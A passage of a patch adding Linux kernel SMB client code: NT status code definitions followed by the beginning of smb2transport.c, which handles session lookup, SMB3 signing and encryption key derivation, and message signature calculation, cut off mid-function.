++#define STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED cpu_to_le32(0xC01E05E0)
++#define STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME cpu_to_le32(0xC01E05E1)
++#define STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP cpu_to_le32(0xC01E05E2)
++#define STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED cpu_to_le32(0xC01E05E3)
++#define STATUS_GRAPHICS_INVALID_POINTER cpu_to_le32(0xC01E05E4)
++#define STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE cpu_to_le32(0xC01E05E5)
++#define STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL cpu_to_le32(0xC01E05E6)
++#define STATUS_GRAPHICS_INTERNAL_ERROR cpu_to_le32(0xC01E05E7)
++#define STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS cpu_to_le32(0xC01E05E8)
++#define STATUS_FVE_LOCKED_VOLUME cpu_to_le32(0xC0210000)
++#define STATUS_FVE_NOT_ENCRYPTED cpu_to_le32(0xC0210001)
++#define STATUS_FVE_BAD_INFORMATION cpu_to_le32(0xC0210002)
++#define STATUS_FVE_TOO_SMALL cpu_to_le32(0xC0210003)
++#define STATUS_FVE_FAILED_WRONG_FS cpu_to_le32(0xC0210004)
++#define STATUS_FVE_FAILED_BAD_FS cpu_to_le32(0xC0210005)
++#define STATUS_FVE_FS_NOT_EXTENDED cpu_to_le32(0xC0210006)
++#define STATUS_FVE_FS_MOUNTED cpu_to_le32(0xC0210007)
++#define STATUS_FVE_NO_LICENSE cpu_to_le32(0xC0210008)
++#define STATUS_FVE_ACTION_NOT_ALLOWED cpu_to_le32(0xC0210009)
++#define STATUS_FVE_BAD_DATA cpu_to_le32(0xC021000A)
++#define STATUS_FVE_VOLUME_NOT_BOUND cpu_to_le32(0xC021000B)
++#define STATUS_FVE_NOT_DATA_VOLUME cpu_to_le32(0xC021000C)
++#define STATUS_FVE_CONV_READ_ERROR cpu_to_le32(0xC021000D)
++#define STATUS_FVE_CONV_WRITE_ERROR cpu_to_le32(0xC021000E)
++#define STATUS_FVE_OVERLAPPED_UPDATE cpu_to_le32(0xC021000F)
++#define STATUS_FVE_FAILED_SECTOR_SIZE cpu_to_le32(0xC0210010)
++#define STATUS_FVE_FAILED_AUTHENTICATION cpu_to_le32(0xC0210011)
++#define STATUS_FVE_NOT_OS_VOLUME cpu_to_le32(0xC0210012)
++#define STATUS_FVE_KEYFILE_NOT_FOUND cpu_to_le32(0xC0210013)
++#define STATUS_FVE_KEYFILE_INVALID cpu_to_le32(0xC0210014)
++#define STATUS_FVE_KEYFILE_NO_VMK cpu_to_le32(0xC0210015)
++#define STATUS_FVE_TPM_DISABLED cpu_to_le32(0xC0210016)
++#define STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO cpu_to_le32(0xC0210017)
++#define STATUS_FVE_TPM_INVALID_PCR cpu_to_le32(0xC0210018)
++#define STATUS_FVE_TPM_NO_VMK cpu_to_le32(0xC0210019)
++#define STATUS_FVE_PIN_INVALID cpu_to_le32(0xC021001A)
++#define STATUS_FVE_AUTH_INVALID_APPLICATION cpu_to_le32(0xC021001B)
++#define STATUS_FVE_AUTH_INVALID_CONFIG cpu_to_le32(0xC021001C)
++#define STATUS_FVE_DEBUGGER_ENABLED cpu_to_le32(0xC021001D)
++#define STATUS_FVE_DRY_RUN_FAILED cpu_to_le32(0xC021001E)
++#define STATUS_FVE_BAD_METADATA_POINTER cpu_to_le32(0xC021001F)
++#define STATUS_FVE_OLD_METADATA_COPY cpu_to_le32(0xC0210020)
++#define STATUS_FVE_REBOOT_REQUIRED cpu_to_le32(0xC0210021)
++#define STATUS_FVE_RAW_ACCESS cpu_to_le32(0xC0210022)
++#define STATUS_FVE_RAW_BLOCKED cpu_to_le32(0xC0210023)
++#define STATUS_FWP_CALLOUT_NOT_FOUND cpu_to_le32(0xC0220001)
++#define STATUS_FWP_CONDITION_NOT_FOUND cpu_to_le32(0xC0220002)
++#define STATUS_FWP_FILTER_NOT_FOUND cpu_to_le32(0xC0220003)
++#define STATUS_FWP_LAYER_NOT_FOUND cpu_to_le32(0xC0220004)
++#define STATUS_FWP_PROVIDER_NOT_FOUND cpu_to_le32(0xC0220005)
++#define STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND cpu_to_le32(0xC0220006)
++#define STATUS_FWP_SUBLAYER_NOT_FOUND cpu_to_le32(0xC0220007)
++#define STATUS_FWP_NOT_FOUND cpu_to_le32(0xC0220008)
++#define STATUS_FWP_ALREADY_EXISTS cpu_to_le32(0xC0220009)
++#define STATUS_FWP_IN_USE cpu_to_le32(0xC022000A)
++#define STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS cpu_to_le32(0xC022000B)
++#define STATUS_FWP_WRONG_SESSION cpu_to_le32(0xC022000C)
++#define STATUS_FWP_NO_TXN_IN_PROGRESS cpu_to_le32(0xC022000D)
++#define STATUS_FWP_TXN_IN_PROGRESS cpu_to_le32(0xC022000E)
++#define STATUS_FWP_TXN_ABORTED cpu_to_le32(0xC022000F)
++#define STATUS_FWP_SESSION_ABORTED cpu_to_le32(0xC0220010)
++#define STATUS_FWP_INCOMPATIBLE_TXN cpu_to_le32(0xC0220011)
++#define STATUS_FWP_TIMEOUT cpu_to_le32(0xC0220012)
++#define STATUS_FWP_NET_EVENTS_DISABLED cpu_to_le32(0xC0220013)
++#define STATUS_FWP_INCOMPATIBLE_LAYER cpu_to_le32(0xC0220014)
++#define STATUS_FWP_KM_CLIENTS_ONLY cpu_to_le32(0xC0220015)
++#define STATUS_FWP_LIFETIME_MISMATCH cpu_to_le32(0xC0220016)
++#define STATUS_FWP_BUILTIN_OBJECT cpu_to_le32(0xC0220017)
++#define STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS cpu_to_le32(0xC0220018)
++#define STATUS_FWP_TOO_MANY_CALLOUTS cpu_to_le32(0xC0220018)
++#define STATUS_FWP_NOTIFICATION_DROPPED cpu_to_le32(0xC0220019)
++#define STATUS_FWP_TRAFFIC_MISMATCH cpu_to_le32(0xC022001A)
++#define STATUS_FWP_INCOMPATIBLE_SA_STATE cpu_to_le32(0xC022001B)
++#define STATUS_FWP_NULL_POINTER cpu_to_le32(0xC022001C)
++#define STATUS_FWP_INVALID_ENUMERATOR cpu_to_le32(0xC022001D)
++#define STATUS_FWP_INVALID_FLAGS cpu_to_le32(0xC022001E)
++#define STATUS_FWP_INVALID_NET_MASK cpu_to_le32(0xC022001F)
++#define STATUS_FWP_INVALID_RANGE cpu_to_le32(0xC0220020)
++#define STATUS_FWP_INVALID_INTERVAL cpu_to_le32(0xC0220021)
++#define STATUS_FWP_ZERO_LENGTH_ARRAY cpu_to_le32(0xC0220022)
++#define STATUS_FWP_NULL_DISPLAY_NAME cpu_to_le32(0xC0220023)
++#define STATUS_FWP_INVALID_ACTION_TYPE cpu_to_le32(0xC0220024)
++#define STATUS_FWP_INVALID_WEIGHT cpu_to_le32(0xC0220025)
++#define STATUS_FWP_MATCH_TYPE_MISMATCH cpu_to_le32(0xC0220026)
++#define STATUS_FWP_TYPE_MISMATCH cpu_to_le32(0xC0220027)
++#define STATUS_FWP_OUT_OF_BOUNDS cpu_to_le32(0xC0220028)
++#define STATUS_FWP_RESERVED cpu_to_le32(0xC0220029)
++#define STATUS_FWP_DUPLICATE_CONDITION cpu_to_le32(0xC022002A)
++#define STATUS_FWP_DUPLICATE_KEYMOD cpu_to_le32(0xC022002B)
++#define STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER cpu_to_le32(0xC022002C)
++#define STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER cpu_to_le32(0xC022002D)
++#define STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER cpu_to_le32(0xC022002E)
++#define STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT cpu_to_le32(0xC022002F)
++#define STATUS_FWP_INCOMPATIBLE_AUTH_METHOD cpu_to_le32(0xC0220030)
++#define STATUS_FWP_INCOMPATIBLE_DH_GROUP cpu_to_le32(0xC0220031)
++#define STATUS_FWP_EM_NOT_SUPPORTED cpu_to_le32(0xC0220032)
++#define STATUS_FWP_NEVER_MATCH cpu_to_le32(0xC0220033)
++#define STATUS_FWP_PROVIDER_CONTEXT_MISMATCH cpu_to_le32(0xC0220034)
++#define STATUS_FWP_INVALID_PARAMETER cpu_to_le32(0xC0220035)
++#define STATUS_FWP_TOO_MANY_SUBLAYERS cpu_to_le32(0xC0220036)
++#define STATUS_FWP_CALLOUT_NOTIFICATION_FAILED cpu_to_le32(0xC0220037)
++#define STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG cpu_to_le32(0xC0220038)
++#define STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG cpu_to_le32(0xC0220039)
++#define STATUS_FWP_TCPIP_NOT_READY cpu_to_le32(0xC0220100)
++#define STATUS_FWP_INJECT_HANDLE_CLOSING cpu_to_le32(0xC0220101)
++#define STATUS_FWP_INJECT_HANDLE_STALE cpu_to_le32(0xC0220102)
++#define STATUS_FWP_CANNOT_PEND cpu_to_le32(0xC0220103)
++#define STATUS_NDIS_CLOSING cpu_to_le32(0xC0230002)
++#define STATUS_NDIS_BAD_VERSION cpu_to_le32(0xC0230004)
++#define STATUS_NDIS_BAD_CHARACTERISTICS cpu_to_le32(0xC0230005)
++#define STATUS_NDIS_ADAPTER_NOT_FOUND cpu_to_le32(0xC0230006)
++#define STATUS_NDIS_OPEN_FAILED cpu_to_le32(0xC0230007)
++#define STATUS_NDIS_DEVICE_FAILED cpu_to_le32(0xC0230008)
++#define STATUS_NDIS_MULTICAST_FULL cpu_to_le32(0xC0230009)
++#define STATUS_NDIS_MULTICAST_EXISTS cpu_to_le32(0xC023000A)
++#define STATUS_NDIS_MULTICAST_NOT_FOUND cpu_to_le32(0xC023000B)
++#define STATUS_NDIS_REQUEST_ABORTED cpu_to_le32(0xC023000C)
++#define STATUS_NDIS_RESET_IN_PROGRESS cpu_to_le32(0xC023000D)
++#define STATUS_NDIS_INVALID_PACKET cpu_to_le32(0xC023000F)
++#define STATUS_NDIS_INVALID_DEVICE_REQUEST cpu_to_le32(0xC0230010)
++#define STATUS_NDIS_ADAPTER_NOT_READY cpu_to_le32(0xC0230011)
++#define STATUS_NDIS_INVALID_LENGTH cpu_to_le32(0xC0230014)
++#define STATUS_NDIS_INVALID_DATA cpu_to_le32(0xC0230015)
++#define STATUS_NDIS_BUFFER_TOO_SHORT cpu_to_le32(0xC0230016)
++#define STATUS_NDIS_INVALID_OID cpu_to_le32(0xC0230017)
++#define STATUS_NDIS_ADAPTER_REMOVED cpu_to_le32(0xC0230018)
++#define STATUS_NDIS_UNSUPPORTED_MEDIA cpu_to_le32(0xC0230019)
++#define STATUS_NDIS_GROUP_ADDRESS_IN_USE cpu_to_le32(0xC023001A)
++#define STATUS_NDIS_FILE_NOT_FOUND cpu_to_le32(0xC023001B)
++#define STATUS_NDIS_ERROR_READING_FILE cpu_to_le32(0xC023001C)
++#define STATUS_NDIS_ALREADY_MAPPED cpu_to_le32(0xC023001D)
++#define STATUS_NDIS_RESOURCE_CONFLICT cpu_to_le32(0xC023001E)
++#define STATUS_NDIS_MEDIA_DISCONNECTED cpu_to_le32(0xC023001F)
++#define STATUS_NDIS_INVALID_ADDRESS cpu_to_le32(0xC0230022)
++#define STATUS_NDIS_PAUSED cpu_to_le32(0xC023002A)
++#define STATUS_NDIS_INTERFACE_NOT_FOUND cpu_to_le32(0xC023002B)
++#define STATUS_NDIS_UNSUPPORTED_REVISION cpu_to_le32(0xC023002C)
++#define STATUS_NDIS_INVALID_PORT cpu_to_le32(0xC023002D)
++#define STATUS_NDIS_INVALID_PORT_STATE cpu_to_le32(0xC023002E)
++#define STATUS_NDIS_LOW_POWER_STATE cpu_to_le32(0xC023002F)
++#define STATUS_NDIS_NOT_SUPPORTED cpu_to_le32(0xC02300BB)
++#define STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED cpu_to_le32(0xC0232000)
++#define STATUS_NDIS_DOT11_MEDIA_IN_USE cpu_to_le32(0xC0232001)
++#define STATUS_NDIS_DOT11_POWER_STATE_INVALID cpu_to_le32(0xC0232002)
++#define STATUS_IPSEC_BAD_SPI cpu_to_le32(0xC0360001)
++#define STATUS_IPSEC_SA_LIFETIME_EXPIRED cpu_to_le32(0xC0360002)
++#define STATUS_IPSEC_WRONG_SA cpu_to_le32(0xC0360003)
++#define STATUS_IPSEC_REPLAY_CHECK_FAILED cpu_to_le32(0xC0360004)
++#define STATUS_IPSEC_INVALID_PACKET cpu_to_le32(0xC0360005)
++#define STATUS_IPSEC_INTEGRITY_CHECK_FAILED cpu_to_le32(0xC0360006)
++#define STATUS_IPSEC_CLEAR_TEXT_DROP cpu_to_le32(0xC0360007)
+diff --git a/fs/smb/client/smb2transport.c b/fs/smb/client/smb2transport.c
+new file mode 100644
+index 0000000000000..790acf65a0926
+--- /dev/null
++++ b/fs/smb/client/smb2transport.c
+@@ -0,0 +1,934 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002, 2011
++ *                 Etersoft, 2012
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *              Jeremy Allison (jra@samba.org) 2006
++ *              Pavel Shilovsky (pshilovsky@samba.org) 2012
++ *
++ */
++
++#include <linux/fs.h>
++#include <linux/list.h>
++#include <linux/wait.h>
++#include <linux/net.h>
++#include <linux/delay.h>
++#include <linux/uaccess.h>
++#include <asm/processor.h>
++#include <linux/mempool.h>
++#include <linux/highmem.h>
++#include <crypto/aead.h>
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "smb2proto.h"
++#include "cifs_debug.h"
++#include "smb2status.h"
++#include "smb2glob.h"
++
++static int
++smb3_crypto_shash_allocate(struct TCP_Server_Info *server)
++{
++	struct cifs_secmech *p = &server->secmech;
++	int rc;
++
++	rc = cifs_alloc_hash("hmac(sha256)", &p->hmacsha256);
++	if (rc)
++		goto err;
++
++	rc = cifs_alloc_hash("cmac(aes)", &p->aes_cmac);
++	if (rc)
++		goto err;
++
++	return 0;
++err:
++	cifs_free_hash(&p->hmacsha256);
++	return rc;
++}
++
++int
++smb311_crypto_shash_allocate(struct TCP_Server_Info *server)
++{
++	struct cifs_secmech *p = &server->secmech;
++	int rc = 0;
++
++	rc = cifs_alloc_hash("hmac(sha256)", &p->hmacsha256);
++	if (rc)
++		return rc;
++
++	rc = cifs_alloc_hash("cmac(aes)", &p->aes_cmac);
++	if (rc)
++		goto err;
++
++	rc = cifs_alloc_hash("sha512", &p->sha512);
++	if (rc)
++		goto err;
++
++	return 0;
++
++err:
++	cifs_free_hash(&p->aes_cmac);
++	cifs_free_hash(&p->hmacsha256);
++	return rc;
++}
++
++
++static
++int smb2_get_sign_key(__u64 ses_id, struct TCP_Server_Info *server, u8 *key)
++{
++	struct cifs_chan *chan;
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses = NULL;
++	int i;
++	int rc = 0;
++	bool is_binding = false;
++
++	spin_lock(&cifs_tcp_ses_lock);
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		if (ses->Suid == ses_id)
++			goto found;
++	}
++	cifs_server_dbg(VFS, "%s: Could not find session 0x%llx\n",
++			__func__, ses_id);
++	rc = -ENOENT;
++	goto out;
++
++found:
++	spin_lock(&ses->ses_lock);
++	spin_lock(&ses->chan_lock);
++
++	is_binding = (cifs_chan_needs_reconnect(ses, server) &&
++		      ses->ses_status == SES_GOOD);
++	if (is_binding) {
++		/*
++		 * If we are in the process of binding a new channel
++		 * to an existing session, use the master connection
++		 * session key
++		 */
++		memcpy(key, ses->smb3signingkey, SMB3_SIGN_KEY_SIZE);
++		spin_unlock(&ses->chan_lock);
++		spin_unlock(&ses->ses_lock);
++		goto out;
++	}
++
++	/*
++	 * Otherwise, use the channel key.
++	 */
++
++	for (i = 0; i < ses->chan_count; i++) {
++		chan = ses->chans + i;
++		if (chan->server == server) {
++			memcpy(key, chan->signkey, SMB3_SIGN_KEY_SIZE);
++			spin_unlock(&ses->chan_lock);
++			spin_unlock(&ses->ses_lock);
++			goto out;
++		}
++	}
++	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
++
++	cifs_dbg(VFS,
++		 "%s: Could not find channel signing key for session 0x%llx\n",
++		 __func__, ses_id);
++	rc = -ENOENT;
++
++out:
++	spin_unlock(&cifs_tcp_ses_lock);
++	return rc;
++}
++
++static struct cifs_ses *
++smb2_find_smb_ses_unlocked(struct TCP_Server_Info *server, __u64 ses_id)
++{
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses;
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		if (ses->Suid != ses_id)
++			continue;
++		++ses->ses_count;
++		return ses;
++	}
++
++	return NULL;
++}
++
++struct cifs_ses *
++smb2_find_smb_ses(struct TCP_Server_Info *server, __u64 ses_id)
++{
++	struct cifs_ses *ses;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	ses = smb2_find_smb_ses_unlocked(server, ses_id);
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	return ses;
++}
++
++static struct cifs_tcon *
++smb2_find_smb_sess_tcon_unlocked(struct cifs_ses *ses, __u32  tid)
++{
++	struct cifs_tcon *tcon;
++
++	list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++		if (tcon->tid != tid)
++			continue;
++		++tcon->tc_count;
++		return tcon;
++	}
++
++	return NULL;
++}
++
++/*
++ * Obtain tcon corresponding to the tid in the given
++ * cifs_ses
++ */
++
++struct cifs_tcon *
++smb2_find_smb_tcon(struct TCP_Server_Info *server, __u64 ses_id, __u32  tid)
++{
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	ses = smb2_find_smb_ses_unlocked(server, ses_id);
++	if (!ses) {
++		spin_unlock(&cifs_tcp_ses_lock);
++		return NULL;
++	}
++	tcon = smb2_find_smb_sess_tcon_unlocked(ses, tid);
++	if (!tcon) {
++		cifs_put_smb_ses(ses);
++		spin_unlock(&cifs_tcp_ses_lock);
++		return NULL;
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++	/* tcon already has a ref to ses, so we don't need ses anymore */
++	cifs_put_smb_ses(ses);
++
++	return tcon;
++}
++
++int
++smb2_calc_signature(struct smb_rqst *rqst, struct TCP_Server_Info *server,
++			bool allocate_crypto)
++{
++	int rc;
++	unsigned char smb2_signature[SMB2_HMACSHA256_SIZE];
++	unsigned char *sigptr = smb2_signature;
++	struct kvec *iov = rqst->rq_iov;
++	struct smb2_hdr *shdr = (struct smb2_hdr *)iov[0].iov_base;
++	struct cifs_ses *ses;
++	struct shash_desc *shash = NULL;
++	struct smb_rqst drqst;
++
++	ses = smb2_find_smb_ses(server, le64_to_cpu(shdr->SessionId));
++	if (unlikely(!ses)) {
++		cifs_server_dbg(VFS, "%s: Could not find session\n", __func__);
++		return -ENOENT;
++	}
++
++	memset(smb2_signature, 0x0, SMB2_HMACSHA256_SIZE);
++	memset(shdr->Signature, 0x0, SMB2_SIGNATURE_SIZE);
++
++	if (allocate_crypto) {
++		rc = cifs_alloc_hash("hmac(sha256)", &shash);
++		if (rc) {
++			cifs_server_dbg(VFS,
++					"%s: sha256 alloc failed\n", __func__);
++			goto out;
++		}
++	} else {
++		shash = server->secmech.hmacsha256;
++	}
++
++	rc = crypto_shash_setkey(shash->tfm, ses->auth_key.response,
++			SMB2_NTLMV2_SESSKEY_SIZE);
++	if (rc) {
++		cifs_server_dbg(VFS,
++				"%s: Could not update with response\n",
++				__func__);
++		goto out;
++	}
++
++	rc = crypto_shash_init(shash);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not init sha256", __func__);
++		goto out;
++	}
++
++	/*
++	 * For SMB2+, __cifs_calc_signature() expects to sign only the actual
++	 * data, that is, iov[0] should not contain a rfc1002 length.
++	 *
++	 * Sign the rfc1002 length prior to passing the data (iov[1-N]) down to
++	 * __cifs_calc_signature().
++	 */
++	drqst = *rqst;
++	if (drqst.rq_nvec >= 2 && iov[0].iov_len == 4) {
++		rc = crypto_shash_update(shash, iov[0].iov_base,
++					 iov[0].iov_len);
++		if (rc) {
++			cifs_server_dbg(VFS,
++					"%s: Could not update with payload\n",
++					__func__);
++			goto out;
++		}
++		drqst.rq_iov++;
++		drqst.rq_nvec--;
++	}
++
++	rc = __cifs_calc_signature(&drqst, server, sigptr, shash);
++	if (!rc)
++		memcpy(shdr->Signature, sigptr, SMB2_SIGNATURE_SIZE);
++
++out:
++	if (allocate_crypto)
++		cifs_free_hash(&shash);
++	if (ses)
++		cifs_put_smb_ses(ses);
++	return rc;
++}
++
++static int generate_key(struct cifs_ses *ses, struct kvec label,
++			struct kvec context, __u8 *key, unsigned int key_size)
++{
++	unsigned char zero = 0x0;
++	__u8 i[4] = {0, 0, 0, 1};
++	__u8 L128[4] = {0, 0, 0, 128};
++	__u8 L256[4] = {0, 0, 1, 0};
++	int rc = 0;
++	unsigned char prfhash[SMB2_HMACSHA256_SIZE];
++	unsigned char *hashptr = prfhash;
++	struct TCP_Server_Info *server = ses->server;
++
++	memset(prfhash, 0x0, SMB2_HMACSHA256_SIZE);
++	memset(key, 0x0, key_size);
++
++	rc = smb3_crypto_shash_allocate(server);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: crypto alloc failed\n", __func__);
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_setkey(server->secmech.hmacsha256->tfm,
++		ses->auth_key.response, SMB2_NTLMV2_SESSKEY_SIZE);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not set with session key\n", __func__);
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_init(server->secmech.hmacsha256);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not init sign hmac\n", __func__);
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_update(server->secmech.hmacsha256, i, 4);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not update with n\n", __func__);
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_update(server->secmech.hmacsha256, label.iov_base, label.iov_len);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not update with label\n", __func__);
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_update(server->secmech.hmacsha256, &zero, 1);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not update with zero\n", __func__);
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_update(server->secmech.hmacsha256, context.iov_base, context.iov_len);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not update with context\n", __func__);
++		goto smb3signkey_ret;
++	}
++
++	if ((server->cipher_type == SMB2_ENCRYPTION_AES256_CCM) ||
++		(server->cipher_type == SMB2_ENCRYPTION_AES256_GCM)) {
++		rc = crypto_shash_update(server->secmech.hmacsha256, L256, 4);
++	} else {
++		rc = crypto_shash_update(server->secmech.hmacsha256, L128, 4);
++	}
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not update with L\n", __func__);
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_final(server->secmech.hmacsha256, hashptr);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not generate sha256 hash\n", __func__);
++		goto smb3signkey_ret;
++	}
++
++	memcpy(key, hashptr, key_size);
++
++smb3signkey_ret:
++	return rc;
++}
++
++struct derivation {
++	struct kvec label;
++	struct kvec context;
++};
++
++struct derivation_triplet {
++	struct derivation signing;
++	struct derivation encryption;
++	struct derivation decryption;
++};
++
++static int
++generate_smb3signingkey(struct cifs_ses *ses,
++			struct TCP_Server_Info *server,
++			const struct derivation_triplet *ptriplet)
++{
++	int rc;
++	bool is_binding = false;
++	int chan_index = 0;
++
++	spin_lock(&ses->ses_lock);
++	spin_lock(&ses->chan_lock);
++	is_binding = (cifs_chan_needs_reconnect(ses, server) &&
++		      ses->ses_status == SES_GOOD);
++
++	chan_index = cifs_ses_get_chan_index(ses, server);
++	/* TODO: introduce ref counting for channels when the can be freed */
++	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
++
++	/*
++	 * All channels use the same encryption/decryption keys but
++	 * they have their own signing key.
++	 *
++	 * When we generate the keys, check if it is for a new channel
++	 * (binding) in which case we only need to generate a signing
++	 * key and store it in the channel as to not overwrite the
++	 * master connection signing key stored in the session
++	 */
++
++	if (is_binding) {
++		rc = generate_key(ses, ptriplet->signing.label,
++				  ptriplet->signing.context,
++				  ses->chans[chan_index].signkey,
++				  SMB3_SIGN_KEY_SIZE);
++		if (rc)
++			return rc;
++	} else {
++		rc = generate_key(ses, ptriplet->signing.label,
++				  ptriplet->signing.context,
++				  ses->smb3signingkey,
++				  SMB3_SIGN_KEY_SIZE);
++		if (rc)
++			return rc;
++
++		/* safe to access primary channel, since it will never go away */
++		spin_lock(&ses->chan_lock);
++		memcpy(ses->chans[chan_index].signkey, ses->smb3signingkey,
++		       SMB3_SIGN_KEY_SIZE);
++		spin_unlock(&ses->chan_lock);
++
++		rc = generate_key(ses, ptriplet->encryption.label,
++				  ptriplet->encryption.context,
++				  ses->smb3encryptionkey,
++				  SMB3_ENC_DEC_KEY_SIZE);
++		rc = generate_key(ses, ptriplet->decryption.label,
++				  ptriplet->decryption.context,
++				  ses->smb3decryptionkey,
++				  SMB3_ENC_DEC_KEY_SIZE);
++		if (rc)
++			return rc;
++	}
++
++	if (rc)
++		return rc;
++
++#ifdef CONFIG_CIFS_DEBUG_DUMP_KEYS
++	cifs_dbg(VFS, "%s: dumping generated AES session keys\n", __func__);
++	/*
++	 * The session id is opaque in terms of endianness, so we can't
++	 * print it as a long long. we dump it as we got it on the wire
++	 */
++	cifs_dbg(VFS, "Session Id    %*ph\n", (int)sizeof(ses->Suid),
++			&ses->Suid);
++	cifs_dbg(VFS, "Cipher type   %d\n", server->cipher_type);
++	cifs_dbg(VFS, "Session Key   %*ph\n",
++		 SMB2_NTLMV2_SESSKEY_SIZE, ses->auth_key.response);
++	cifs_dbg(VFS, "Signing Key   %*ph\n",
++		 SMB3_SIGN_KEY_SIZE, ses->smb3signingkey);
++	if ((server->cipher_type == SMB2_ENCRYPTION_AES256_CCM) ||
++		(server->cipher_type == SMB2_ENCRYPTION_AES256_GCM)) {
++		cifs_dbg(VFS, "ServerIn Key  %*ph\n",
++				SMB3_GCM256_CRYPTKEY_SIZE, ses->smb3encryptionkey);
++		cifs_dbg(VFS, "ServerOut Key %*ph\n",
++				SMB3_GCM256_CRYPTKEY_SIZE, ses->smb3decryptionkey);
++	} else {
++		cifs_dbg(VFS, "ServerIn Key  %*ph\n",
++				SMB3_GCM128_CRYPTKEY_SIZE, ses->smb3encryptionkey);
++		cifs_dbg(VFS, "ServerOut Key %*ph\n",
++				SMB3_GCM128_CRYPTKEY_SIZE, ses->smb3decryptionkey);
++	}
++#endif
++	return rc;
++}
++
++int
++generate_smb30signingkey(struct cifs_ses *ses,
++			 struct TCP_Server_Info *server)
++
++{
++	struct derivation_triplet triplet;
++	struct derivation *d;
++
++	d = &triplet.signing;
++	d->label.iov_base = "SMB2AESCMAC";
++	d->label.iov_len = 12;
++	d->context.iov_base = "SmbSign";
++	d->context.iov_len = 8;
++
++	d = &triplet.encryption;
++	d->label.iov_base = "SMB2AESCCM";
++	d->label.iov_len = 11;
++	d->context.iov_base = "ServerIn ";
++	d->context.iov_len = 10;
++
++	d = &triplet.decryption;
++	d->label.iov_base = "SMB2AESCCM";
++	d->label.iov_len = 11;
++	d->context.iov_base = "ServerOut";
++	d->context.iov_len = 10;
++
++	return generate_smb3signingkey(ses, server, &triplet);
++}
++
++int
++generate_smb311signingkey(struct cifs_ses *ses,
++			  struct TCP_Server_Info *server)
++
++{
++	struct derivation_triplet triplet;
++	struct derivation *d;
++
++	d = &triplet.signing;
++	d->label.iov_base = "SMBSigningKey";
++	d->label.iov_len = 14;
++	d->context.iov_base = ses->preauth_sha_hash;
++	d->context.iov_len = 64;
++
++	d = &triplet.encryption;
++	d->label.iov_base = "SMBC2SCipherKey";
++	d->label.iov_len = 16;
++	d->context.iov_base = ses->preauth_sha_hash;
++	d->context.iov_len = 64;
++
++	d = &triplet.decryption;
++	d->label.iov_base = "SMBS2CCipherKey";
++	d->label.iov_len = 16;
++	d->context.iov_base = ses->preauth_sha_hash;
++	d->context.iov_len = 64;
++
++	return generate_smb3signingkey(ses, server, &triplet);
++}
++
++int
++smb3_calc_signature(struct smb_rqst *rqst, struct TCP_Server_Info *server,
++			bool allocate_crypto)
++{
++	int rc;
++	unsigned char smb3_signature[SMB2_CMACAES_SIZE];
++	unsigned char *sigptr = smb3_signature;
++	struct kvec *iov = rqst->rq_iov;
++	struct smb2_hdr *shdr = (struct smb2_hdr *)iov[0].iov_base;
++	struct shash_desc *shash = NULL;
++	struct smb_rqst drqst;
++	u8 key[SMB3_SIGN_KEY_SIZE];
++
++	rc = smb2_get_sign_key(le64_to_cpu(shdr->SessionId), server, key);
++	if (unlikely(rc)) {
++		cifs_server_dbg(VFS, "%s: Could not get signing key\n", __func__);
++		return rc;
++	}
++
++	if (allocate_crypto) {
++		rc = cifs_alloc_hash("cmac(aes)", &shash);
